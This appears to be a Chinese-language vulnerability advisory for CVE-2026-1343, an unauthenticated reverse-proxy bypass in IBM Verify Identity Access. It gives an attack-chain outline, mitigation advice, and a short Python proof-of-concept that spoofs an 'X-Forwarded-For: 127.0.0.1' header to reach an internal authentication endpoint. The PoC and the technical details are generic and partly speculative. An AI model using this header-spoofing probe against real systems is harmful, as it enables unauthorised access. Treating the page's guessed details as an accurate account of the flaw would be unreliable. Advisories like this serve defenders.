CVE-2026-1343 CVSS 7.2 高危

CVE-2026-1343 IBM Verify Identity Access 内部端点访问漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1343

漏洞类型

访问控制绕过

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

IBM Verify Identity Access, IBM Security Verify Access

漏洞概述

IBM Verify Identity Access和IBM Security Verify Access的容器及非容器版本存在安全漏洞。由于反向代理配置不当，未经身份验证的远程攻击者可绕过边界防护，直接访问受保护的内部身份验证端点。此漏洞可能导致系统机密性和完整性受到低程度影响，CVSS v3.1评分为7.2，属于高危漏洞。

技术细节

该漏洞的核心问题在于反向代理未能正确拦截或过滤指向内部受保护端点的请求。在受影响版本的架构中，反向代理理应作为安全网关，对外部请求进行认证和授权。然而，攻击者可以通过构造特制的HTTP请求，利用路径遍历或特定的请求头欺骗，绕过反向代理的检查机制，直接向后端内部的认证接口发送请求。由于后端端点可能信任来自内部网络的流量，攻击者因此能够利用此缺陷获取敏感信息或对内部服务进行操作。攻击无需用户交互，且网络攻击复杂度低。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标系统运行的是受影响版本的IBM Verify Identity Access或Security Verify Access。

STEP 2

2. 探测

攻击者向目标服务器发送特制的HTTP请求，试图绕过反向代理直接访问内部认证端点。

STEP 3

3. 利用

由于反向代理配置缺陷，请求成功到达后端内部服务。攻击者无需认证即可获取内部端点返回的数据。

STEP 4

4. 影响

攻击者可能利用获取的信息进一步发起攻击，或导致内部系统状态被非授权修改（完整性影响）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-1343: Internal Endpoint Access via Reverse Proxy Bypass
# This script attempts to access a protected internal endpoint directly.

target_url = "http://target-host/internal/auth/status"

headers = {
    "User-Agent": "CVE-2026-1343-Scanner",
    "X-Forwarded-For": "127.0.0.1" # Attempting to spoof internal origin
}

try:
    response = requests.get(target_url, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Potential Vulnerability Detected!")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

IBM Verify Identity Access Container 11.0 至 11.0.2

IBM Security Verify Access Container 10.0 至 10.0.9.1

IBM Verify Identity Access 11.0 至 11.0.2

IBM Security Verify Access 10.0 至 10.0.9.1

防御指南

临时缓解措施

在未安装补丁前，建议管理员严格限制反向代理与后端服务器之间的网络通信规则，确保只有合法的代理流量才能通过。同时，建议启用详细的日志审计功能，监控是否有针对内部端点的异常直接访问请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1343
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1343
3 Details https://www.cvedetails.com/cve/CVE-2026-1343/
4 VulDB https://vuldb.com/cve/CVE-2026-1343
5 Link https://www.ibm.com/support/pages/node/7268253

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表